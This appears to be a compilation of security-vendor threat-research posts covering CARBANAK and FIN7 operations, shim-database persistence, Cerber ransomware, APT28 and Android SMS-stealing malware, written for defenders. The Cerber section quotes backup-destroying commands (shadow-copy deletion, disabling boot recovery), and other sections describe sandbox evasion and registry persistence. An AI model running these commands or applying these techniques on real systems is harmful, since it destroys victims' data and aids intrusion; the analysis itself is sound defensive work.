Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date































Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active now to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk as we discussed above and are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077” was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 

Introducing for macOS

UPDATE (April 4, 2018): now supports macOS 10.13.

As a malware analyst or systems programmer, having a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from the legendary Sysinternals Suite from Microsoft. Those tools only work on Windows though and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used dynamic instrumentation tools such as Dtrace, a very powerful tracing subsystem built into the core of macOS. While it is very powerful and efficient, it commonly required us to write D scripts to get the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of for macOS, a simple GUI application for monitoring common system events on a macOS host. captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY Events identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features. There is the start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on types of data we may want to filter or search for over all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a TimeMachine backup were to kick off when the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.

As an example, perhaps we were interested in seeing any processes that communicated with We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Please send any feature requests/bugs to

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings

In late February 2017, FireEye as a Service (FaaS) identified a spear phishing campaign that appeared to be targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. Based on multiple identified overlaps in infrastructure and the use of similar tools, tactics, and procedures (TTPs), we have high confidence that this campaign is associated with the financially motivated threat group tracked by FireEye as FIN7.

FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware. We have observed FIN7 attempt to compromise diverse organizations for malicious operations – usually involving the deployment of point-of-sale malware – primarily against the retail and hospitality industries.

Spear Phishing Campaign

All of the observed intended recipients of the spear phishing campaign appeared to be involved with SEC filings for their respective organizations. Many of the recipients were even listed in their company’s SEC filings. The sender email address was spoofed as EDGAR <> and the attachment was named “Important_Changes_to_Form10_K.doc” (MD5: d04b6410dddee19adec75f597c52e386). An example email is shown in Figure 1.

Figure 1: Example of a phishing email sent during this campaign

We have observed the following TTPs with this campaign:

  • The malicious documents drop a VBS script that installs a PowerShell backdoor, which uses DNS TXT records for its command and control. This backdoor appears to be a new malware family that FireEye iSIGHT Intelligence has dubbed POWERSOURCE. POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams. Using DNS TXT records to communicate is not an entirely new finding, but it should be noted that this has been a rising trend since 2013 likely because it makes detection and hunting for command and control traffic difficult.
  • We also observed POWERSOURCE being used to download a second-stage PowerShell backdoor called TEXTMATE in an effort to further infect the victim machine. The TEXTMATE backdoor provides a reverse shell to attackers and uses DNS TXT queries to tunnel interactive commands and other data. TEXTMATE is “memory resident” – often described as “fileless” malware. This is not a novel technique by any means, but it’s worth noting since it presents detection challenges and further speaks to the threat actor’s ability to remain stealthy and nimble in operations.
  • In some cases, we identified a Cobalt Strike Beacon payload being delivered via POWERSOURCE. This particular Cobalt Strike stager payload was previously used in operations linked to FIN7.
  • We observed that the same domain hosting the Cobalt Strike Beacon payload was also hosting a CARBANAK backdoor sample compiled in February 2017. CARBANAK malware has been used heavily by FIN7 in previous operations.

Thus far, we have directly identified 11 targeted organizations in the following sectors:

  • Financial services, with different victims having insurance, investment, card services, and loan focuses
  • Transportation
  • Retail
  • Education
  • IT services
  • Electronics

All these organizations are based in the United States, and many have international presences. As the SEC is a U.S. regulatory organization, we would expect recipients of these spear phishing attempts to either work for U.S.-based organizations or be U.S.-based representatives of organizations located elsewhere. However, it is possible that the attackers could perform similar activity mimicking other regulatory organizations in other countries.


We have not yet identified FIN7’s ultimate goal in this campaign, as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft.  However, we surmise FIN7 can profit from compromised organizations in several ways. If the attackers are attempting to compromise persons involved in SEC filings due to their information access, they may ultimately be pursuing securities fraud or other investment abuse. Alternatively, if they are tailoring their social engineering to these individuals, but have other goals once they have established a foothold, they may intend to pursue one of many other fraud types.

Previous FIN7 operations deployed multiple point-of-sale malware families for the purpose of collecting and exfiltrating sensitive financial data. The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions, ATM compromise, and other monetization schemes.

Community Protection Event

FireEye implemented a Community Protection Event – FaaS, Mandiant, Intelligence, and Products – to secure all clients affected by this campaign. In this instance, an incident detected by FaaS led to the deployment of additional detections by the FireEye Labs team after FireEye Labs Advanced Reverse Engineering quickly analyzed the malware. Detections were then quickly deployed to the suite of FireEye products.

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the POWERSOURCE and TEXTMATE malware. Click here for more information.

M-Trends Asia Pacific: Organizations Must Improve at Detecting and Responding to Breaches

Since 2010, Mandiant, a FireEye company, has presented trends, statistics and case studies of some of the largest and most sophisticated cyber attacks. In February 2016, we released our annual global M-Trends® report based on data from the breaches we responded to in 2015. Now, we are releasing M-Trends Asia Pacific, our first report to focus on this very diverse and dynamic region.

Some of the key findings include:

  • Most breaches in the Asia Pacific region never became public. Most governments and industry-governing bodies are without effective breach disclosure laws, although this is slowly changing.
  • The median time of discovery of an attack was 520 days after the initial compromise. This is 374 days longer than the global median of 146 days.
  • Mandiant was engaged by many organizations that have already conducted forensic investigations (internally or using third parties), but failed to eradicate the attackers from their environments. These efforts sometimes made matters worse by destroying or damaging the forensic evidence needed to understand the full extent of a breach or to attribute activity to a specific threat actor.
  • Some attacker tools were used to almost exclusively target organizations within APAC. In April 2015, we uncovered the malicious efforts of APT30, a suspected China-based threat group that has exploited the networks of governments and organizations across the region, targeting highly sensitive political, economic and military information.

Download M-Trends Asia Pacific to learn more.

Analyzing the Malware Analysts – Inside FireEye’s FLARE Team

At the Black Hat USA 2016 conference in Las Vegas last week, I was fortunate to sit down with Michael Sikorski, Director, FireEye Labs Advanced Reverse Engineering (FLARE) Team.

During our conversation we discussed the origin of the FLARE team, what it takes to analyze malware, Michael’s book “Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software,” and the latest open source freeware tools FLOSS and FakeNet-NG.

Listen to the full podcast here.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

Android.MisoSMS : Its Back! Now With XTEA


FireEye Labs recently found a more advanced variant of Android.MisoSMS, the SMS-stealing malware that we uncovered last December — yet another sign of cybercriminals’ growing interest in hijacking mobile devices for surveillance and data theft.

Like the original version of the malware, the new variant sends copies of users’ text messages to servers in China. But the newest rendition adds a few features that make it harder to detect, including a new disguise, encrypted transmissions, and command-and-control (CnC) communications that are handled natively rather than over email.

FireEye Mobile Threat Prevention customers are already protected from both variants.


Both variants of MisoSMS use the same names for receivers and services. While the old variant masquerades as an Android settings application, the new version presents itself as “Gplay Dsc” to the user.

The new variant also abandons SMTP email as the transport method. It now handles all CnC communication natively in C++, making it harder for an analyst to analyze the malware by disassembling its ARM code.

The newer version also hard codes specific public DNS servers such as the following:


The new MisoSMS attempts to resolve its CnC domain name(puk[dot]nespigt[dot]iego[dot]net) from one of these DNS servers. In this way, MisoSMS stays quiet in sandbox environments, which typically use internal DNS servers and cut off access to outside networks. If the malware cannot access the hard-coded DNS servers, it does nothing and is therefore not detected.

The new MisoSMS also uses a variant of the XTEA encryption algorithm to communicate with its CnC server. The request and responses of the CnC server are structured so that the first four bytes of the request and response contain the length of the encrypted blob of data. By skipping the first four bytes, we can decrypt the communications using the key embedded in the native binary.

Figure 1 shows MisoSMS registering a newly infected device with the CnC server. The first four bytes in the encrypted payload mark the length of the message. The rest of the payload contains information about the infected device.

